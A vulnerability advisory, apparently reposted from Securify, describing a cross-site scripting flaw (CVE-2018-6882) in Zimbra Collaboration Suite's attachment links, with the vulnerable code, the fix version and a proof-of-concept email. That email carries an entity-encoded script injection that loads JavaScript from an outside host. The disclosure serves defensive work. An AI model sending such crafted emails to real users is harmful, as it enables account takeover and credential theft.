Zimbra Collaboration Suite 8.7.11_GA_1854 Cross Site Scripting

2018.03.27
Credit: Securify B.V.
Risk: Low
Local: Yes
Remote: No
CWE: CWE-79


CVSS Base Score: 4.3/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

------------------------------------------------------------------------ Cross-Site Scripting vulnerability in Zimbra Collaboration Suite due to the way it handles attachment links ------------------------------------------------------------------------ Stephan Kaag, January 2018 ------------------------------------------------------------------------ Abstract ------------------------------------------------------------------------ A Cross-Site Scripting (XSS) vulnerability was found in Zimbra Collaboration Suite (ZCS). This issue allows an attacker to perform a wide variety of actions such as performing arbitrary actions on their behalf or presenting a fake login screen to collect usernames and passwords. In order to exploit this issue, the attacker has to lure a victim into opening a specially crafted email in ZCS. ------------------------------------------------------------------------ See also ------------------------------------------------------------------------ - CVE-2018-6882 - https://wiki.zimbra.com/wiki/Zimbra_Releases/8.8.7 - https://bugzilla.zimbra.com/show_bug.cgi?id=108786 - https://wiki.zimbra.com/wiki/Zimbra_Security_Advisories ------------------------------------------------------------------------ Tested versions ------------------------------------------------------------------------ This issue was successfully tested on ZCS 8.7.11_GA_1854 (build 20170531151956). It is however likely that this issue is present in all versions of ZCS from version 8.5.0 on. ------------------------------------------------------------------------ Fix ------------------------------------------------------------------------ The issue is fixed in Zimbra Collaboration Suite version 8.8.7. ------------------------------------------------------------------------ Details ------------------------------------------------------------------------ https://www.securify.nl/advisory/SFY20180101/cross-site-scripting-vulnerability-in-zimbra-collaboration-suite-due-to-the-way-it-handles-attachment-links.html If an email is opened that contains one or more attachments, a link ('<a>' tag) is created for each attachment. The code responsible for doing this is contained in the ZmMailMsgView.getAttachmentLinkHtml function. ZmMailMsgView.getAttachmentLinkHtml = function(params) { var html = [], i = 0; html[i++] = "<a class='AttLink' "; [..] var href = params.href || (params.jsHref && "javascript:;"); html[i++] = href ? "href='" + href + "' " : ""; [..] html[i++] = "'>" + AjxStringUtil.htmlEncode(params.text) + "</a>"; return html.join(""); }; In the above code the value for params.href is taken directly from the Content-Location header in the message. No sanitization is performed, and the value in the header can be influenced by an attacker. As a result it is possible to inject arbitrary HTML or JavaScript in the '<a>'-tag. To exploit this issue an attacker can send an email with a specially crafted Content-Location header to a victim user. When the victim opens this message the script code will be executed. Proof of concept The following proof of concept email can be used to demonstrate this issue. When opening this mail, a JavaScript file from an external location will be loaded in Zimbra. ---[snip]--- From: me@example.com To: victim@example.com Subject: Re: My message MIME-Version: 1.0 Date: Thu, 4 Jan 2018 14:25:25 +0100 (CET) Content-Type: multipart/mixed; boundary="----=_Part_112602234_144352703.1515072325170" ------=_Part_112602234_144352703.1515072325170 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit ------=_Part_112602234_144352703.1515072325170 Content-Type: text/plain; name=attachment.txt Content-Disposition: attachment; filename=attachment.txt Content-Transfer-Encoding: base64 Content-Location: http://foo.bar'></a><img src=a onerror=&#119;&#105;&#110;&#100;&#111;&#119;&#46;&#120;&#61;&#100;&#111;&#99;&#117;&#109;&#101;&#110;&#116;&#46;&#99;&#114;&#101;&#97;&#116;&#101;&#69;&#108;&#101;&#109;&#101;&#110;&#116;&#40;&#39;&#115;&#99;&#114;&#105;&#112;&#116;&#39;&#41;&#59;&#119;&#105;&#110;&#100;&#111;&#119;&#46;&#120;&#46;&#115;&#114;&#99;&#61;&#39;&#104;&#116;&#116;&#112;&#115;&#58;&#47;&#47;&#115;&#51;&#45;&#101;&#117;&#45;&#119;&#101;&#115;&#116;&#45;&#49;&#46;&#97;&#109;&#97;&#122;&#111;&#110;&#97;&#119;&#115;&#46;&#99;&#111;&#109;&#47;&#101;&#118;&#105;&#108;&#106;&#115;&#47;&#101;&#118;&#105;&#108;&#46;&#106;&#115;&#39;&#59;&#100;&#111;&#99;&#117;&#109;&#101;&#110;&#116;&#46;&#98;&#111;&#100;&#121;&#46;&#97;&#112;&#112;&#101;&#110;&#100;&#67;&#104;&#105;&#108;&#100;&#40;&#119;&#105;&#110;&#100;&#111;&#119;&#46;&#120;&#41;><a href=' YXR0YWNobWVudAo= ------=_Part_112602234_144352703.1515072325170-- ---[snip]---


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top